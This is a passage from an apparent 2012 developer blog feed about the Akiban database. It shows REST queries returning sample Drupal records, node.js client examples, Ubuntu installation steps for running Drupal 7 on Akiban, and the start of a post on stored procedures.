&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;04/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304554,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304553,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3633,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Defui Et Pertineo Premo Usitas&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    },&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;cid&amp;quot;: 304553,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pid&amp;quot;: 304550,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;nid&amp;quot;: 93447,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 3655,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;subject&amp;quot;: &amp;quot;Amet Gravis Inhibeo Roto Torqueo&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;hostname&amp;quot;: &amp;quot;127.0.0.1&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;changed&amp;quot;: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;thread&amp;quot;: &amp;quot;01.00/&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;devel generate&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;devel_generate@example.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;homepage&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;und&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;    }&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, I&amp;#8217;d like to mention we have a &lt;a href='https://github.com/akiban/akiban-rest-js'&gt;client&lt;/a&gt; for &lt;code&gt;node.js&lt;/code&gt; that can be used with our REST interface. To get information on the schemata in this server and the groups in the &lt;code&gt;drupal&lt;/code&gt; schema, code using this client looks as follows:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='js'&gt;&lt;span class='err'&gt;#&lt;/span&gt;&lt;span class='o'&gt;!&lt;/span&gt;&lt;span class='err'&gt;/usr/bin/env coffee&lt;/span&gt;

&lt;span class='nx'&gt;ak&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;./lib/akiban_rest.js&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='nx'&gt;_&lt;/span&gt;  &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;underscore&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;log&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
  &lt;span class='p'&gt;()&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;========&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;unless&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
      &lt;span class='nx'&gt;_&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;body&lt;/span&gt;&lt;span class='p'&gt;).&lt;/span&gt;&lt;span class='nx'&gt;forEach&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
        &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;if&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;new&lt;/span&gt; &lt;span class='nx'&gt;ak&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;AkibanClient&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;version&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;the server version is&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;schemata&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;and these are all the schemata&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;groups&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;drupal&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;all groups in the drupal schema&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above can be run with the &lt;code&gt;coffee&lt;/code&gt; command like so: &lt;code&gt;coffee
drupal.coffee&lt;/code&gt;.&lt;/p&gt;
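&lt;p&gt;To run these snippets yourself, a plausible setup (assuming you have &lt;code&gt;npm&lt;/code&gt; available; the exact steps depend on the client repository&amp;#8217;s layout) looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;npm install -g coffee-script&lt;/span&gt;
&lt;span class='go'&gt;git clone https://github.com/akiban/akiban-rest-js.git&lt;/span&gt;
&lt;span class='go'&gt;cd akiban-rest-js&lt;/span&gt;
&lt;span class='go'&gt;npm install underscore&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;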

&lt;p&gt;To retrieve a certain node with this client, the code would look like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='js'&gt;&lt;span class='err'&gt;#&lt;/span&gt;&lt;span class='o'&gt;!&lt;/span&gt;&lt;span class='err'&gt;/usr/bin/env coffee&lt;/span&gt;

&lt;span class='nx'&gt;ak&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;./lib/akiban_rest.js&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='nx'&gt;_&lt;/span&gt;  &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='nx'&gt;require&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;underscore&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;log&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
  &lt;span class='p'&gt;()&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;========&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;msg&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;unless&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
      &lt;span class='nx'&gt;_&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;body&lt;/span&gt;&lt;span class='p'&gt;).&lt;/span&gt;&lt;span class='nx'&gt;forEach&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt;
        &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;if&lt;/span&gt; &lt;span class='nx'&gt;arguments&lt;/span&gt;&lt;span class='p'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='p'&gt;].&lt;/span&gt;&lt;span class='nx'&gt;error&lt;/span&gt;
    &lt;span class='nx'&gt;console&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;--------&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;

&lt;span class='nx'&gt;x&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='k'&gt;new&lt;/span&gt; &lt;span class='nx'&gt;ak&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;AkibanClient&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;
&lt;span class='nx'&gt;x&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='nx'&gt;get&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;drupal&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='mi'&gt;2054&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='nx'&gt;res&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;-&amp;gt;&lt;/span&gt; &lt;span class='nx'&gt;log&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s1'&gt;&amp;#39;retrieving nid 2054&amp;#39;&lt;/span&gt;&lt;span class='p'&gt;)(&lt;/span&gt;&lt;span class='nx'&gt;res&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above example results in output like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; coffee drupal.coffee 
&lt;span class='go'&gt;========&lt;/span&gt;
&lt;span class='go'&gt;retrieving nid 2054&lt;/span&gt;
&lt;span class='go'&gt;--------&lt;/span&gt;
&lt;span class='go'&gt;{ nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;  vid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;  type: &amp;#39;page&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  language: &amp;#39;und&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  title: &amp;#39;Eros Iriure Pertineo Refoveo Roto Utrum&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  uid: 3661,&lt;/span&gt;
&lt;span class='go'&gt;  status: 1,&lt;/span&gt;
&lt;span class='go'&gt;  created: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;  changed: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;  comment: 0,&lt;/span&gt;
&lt;span class='go'&gt;  promote: 1,&lt;/span&gt;
&lt;span class='go'&gt;  sticky: 0,&lt;/span&gt;
&lt;span class='go'&gt;  tnid: 0,&lt;/span&gt;
&lt;span class='go'&gt;  translate: 0,&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.comment&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.history&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_access&amp;#39;: [],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_comment_statistics&amp;#39;: &lt;/span&gt;
&lt;span class='go'&gt;   [ { nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;       cid: 0,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_timestamp: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_name: null,&lt;/span&gt;
&lt;span class='go'&gt;       last_comment_uid: 3656,&lt;/span&gt;
&lt;span class='go'&gt;       comment_count: 0 } ],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.node_revision&amp;#39;: &lt;/span&gt;
&lt;span class='go'&gt;   [ { nid: 2054,&lt;/span&gt;
&lt;span class='go'&gt;       vid: 2056,&lt;/span&gt;
&lt;span class='go'&gt;       uid: 1,&lt;/span&gt;
&lt;span class='go'&gt;       title: &amp;#39;Ad Si Suscipere&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;       log: &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;       timestamp: 1355369527,&lt;/span&gt;
&lt;span class='go'&gt;       status: 1,&lt;/span&gt;
&lt;span class='go'&gt;       comment: 0,&lt;/span&gt;
&lt;span class='go'&gt;       promote: 1,&lt;/span&gt;
&lt;span class='go'&gt;       sticky: 0 } ],&lt;/span&gt;
&lt;span class='go'&gt;  &amp;#39;drupal.search_node_links&amp;#39;: [] }&lt;/span&gt;
&lt;span class='go'&gt;--------&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That&amp;#8217;s about it for this post showing off our REST access. As usual, comments are very much welcome, and feel free to ping me on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; if you would like to learn more about Akiban.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Installing Drupal 7 with Akiban</title>
   <link href="http://posulliv.github.com/2012/12/14/drupal-7-install-akiban"/>
   <updated>2012-12-14T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/12/14/drupal-7-install-akiban</id>
   <content type="html">&lt;p&gt;Dries recently published a &lt;a href='http://buytaert.net/using-the-akiban-database-with-drupal'&gt;post&lt;/a&gt; highlighting some work we&amp;#8217;ve done with a particular customer in the Acquia cloud. What I wanted to cover in this post was to how to perform an installation of Akiban and get a Drupal 7 site up and running on Akiban. This post only covers a fresh installation; later posts will cover how to do migration and augmenting an existing site instead of running it entirely on Akbian.&lt;/p&gt;

&lt;p&gt;This post is specific to Ubuntu, but &lt;a href='http://akiban.com/downloads'&gt;Akiban&lt;/a&gt; runs on CentOS too (as well as OS X and Windows, for which we have installers). If people would like to see information specific to those platforms, please let me know in the comments.&lt;/p&gt;

&lt;p&gt;First things first, let&amp;#8217;s install Akiban!&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y python-software-properties&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-developer/ lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server postgresql-client&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above will automatically start the Akiban server process, and half of your available memory will be allocated to the JVM heap by default. If you are interested in modifying any configuration options, please see our &lt;a href='http://www.akiban.com/ak-docs/admin/server/server.config.html'&gt;documentation&lt;/a&gt; on how to do this.&lt;/p&gt;
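&lt;p&gt;Before moving on, it&amp;#8217;s worth a quick smoke test to confirm the server is up. Akiban speaks the Postgres protocol (port 15432 with the default configuration), so something like the following should work; note that the service name is an assumption based on the package name, and the &lt;code&gt;test&lt;/code&gt; schema name is arbitrary:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service akiban-server status&lt;/span&gt;
&lt;span class='go'&gt;psql -h localhost -p 15432 test -c &amp;#39;select 1&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;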

&lt;p&gt;Next, we&amp;#8217;ll download Drupal 7 and install Apache along with the needed PHP database drivers for Akiban.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;wget http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz&lt;/span&gt;
&lt;span class='go'&gt;tar zxvf drupal-7.17.tar.gz&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y apache2 php5-pgsql php5-gd libapache2-mod-php5 php-apc&lt;/span&gt;
&lt;span class='go'&gt;sudo mkdir /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo mv drupal-7.17/* drupal-7.17/.htaccess /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo cp /var/www/drupal/sites/default/default.settings.php /var/www/drupal/sites/default/settings.php&lt;/span&gt;
&lt;span class='go'&gt;sudo chown www-data:www-data /var/www/drupal/sites/default/settings.php&lt;/span&gt;
&lt;span class='go'&gt;sudo mkdir /var/www/drupal/sites/default/files&lt;/span&gt;
&lt;span class='go'&gt;sudo chown www-data:www-data /var/www/drupal/sites/default/files/&lt;/span&gt;
&lt;span class='go'&gt;sudo service apache2 restart&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The final piece of software we need is the Akiban database module for Drupal. Right now, this module is a &lt;a href='http://drupal.org/sandbox/posulliv/1835778'&gt;sandbox project on drupal.org&lt;/a&gt; so the only way to download it is to check it out with &lt;code&gt;git&lt;/code&gt;:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y git&lt;/span&gt;
&lt;span class='go'&gt;git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban&lt;/span&gt;
&lt;span class='go'&gt;cd akiban&lt;/span&gt;
&lt;span class='go'&gt;git checkout 7.x&lt;/span&gt;
&lt;span class='go'&gt;cd ../&lt;/span&gt;
&lt;span class='go'&gt;sudo cp -R akiban /var/www/drupal/includes/database/.&lt;/span&gt;
&lt;span class='go'&gt;sudo chown -R www-data:www-data /var/www/drupal/includes/database/akiban&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice we had to switch to the &lt;code&gt;7.x&lt;/code&gt; branch. The &lt;code&gt;master&lt;/code&gt; branch in this repository is for running the module with Drupal 8.&lt;/p&gt;

&lt;p&gt;The last thing that needs to be done is to apply a tiny patch to Drupal core. The patch only avoids the creation of 2 indexes in the &lt;code&gt;menu&lt;/code&gt; module; these index definitions are not compatible with our current Akiban release. It&amp;#8217;s likely this will be resolved in a future release, at which point the patch will no longer be needed:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo cp akiban/core.patch /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;cd /var/www/drupal&lt;/span&gt;
&lt;span class='go'&gt;sudo patch -p1 &amp;lt; core.patch&lt;/span&gt;
&lt;span class='go'&gt;cd&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Drupal 7 can now be installed as you normally would. Just make sure to select Akiban as the database during installation!&lt;/p&gt;

&lt;p&gt;After installation completes successfully, we want to group the tables and gather statistics for our cost-based optimizer. 2 SQL scripts are provided to achieve this. They can be run using &lt;code&gt;psql&lt;/code&gt; like so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;psql -h localhost -p 15432 drupal -f akiban/grouping.sql&lt;/span&gt;
&lt;span class='go'&gt;psql -h localhost -p 15432 drupal -f akiban/gather_stats.sql&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The commands above assume &lt;code&gt;drupal&lt;/code&gt; is the name of the schema in which Drupal was installed. That should obviously be changed to the name of the schema you specified during installation.&lt;/p&gt;

&lt;p&gt;That&amp;#8217;s it! You now have a bare Drupal 7 site running on the Akiban database! I have some plans for more posts in the coming weeks. In particular, some things I plan on covering are how to migrate a Drupal site running on MySQL to Akiban and how to use Akiban as a query accelerator for a Drupal site, similar to the use case in the &lt;a href='http://buytaert.net/using-the-akiban-database-with-drupal'&gt;post&lt;/a&gt; Dries wrote. I&amp;#8217;ll also show what is possible with the REST access that we enable straight to our database (hint: it&amp;#8217;s on port 8091).&lt;/p&gt;

&lt;p&gt;If there is anything you would like more information on, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be more than happy to dig in. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;public mailing list&lt;/a&gt; for the Akiban project and I&amp;#8217;d encourage anyone who&amp;#8217;s interested to subscribe to that list and let us know how we&amp;#8217;re doing!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Stored Procedures in Akiban</title>
   <link href="http://posulliv.github.com/2012/11/16/stored-procs"/>
   <updated>2012-11-16T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/11/16/stored-procs</id>
   <content type="html">&lt;p&gt;This week, we released &lt;a href='http://akiban.com/downloads'&gt;version 1.4.3&lt;/a&gt; of Akiban. This release has a bunch of great new features and bug fixes in it. There is one new feature in this release in particular that I wanted write about today. Akiban now has a preview implementation of stored procedures!&lt;/p&gt;

&lt;p&gt;Now that may not sound too exciting in itself so please bear with me. What gets me excited about this feature is that in Akiban, we allow creation of stored procedures in a multitude of languages. Stored procedures can be implemented using:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Java&lt;/li&gt;

&lt;li&gt;Javascript&lt;/li&gt;

&lt;li&gt;Ruby&lt;/li&gt;

&lt;li&gt;Python&lt;/li&gt;

&lt;li&gt;Groovy&lt;/li&gt;

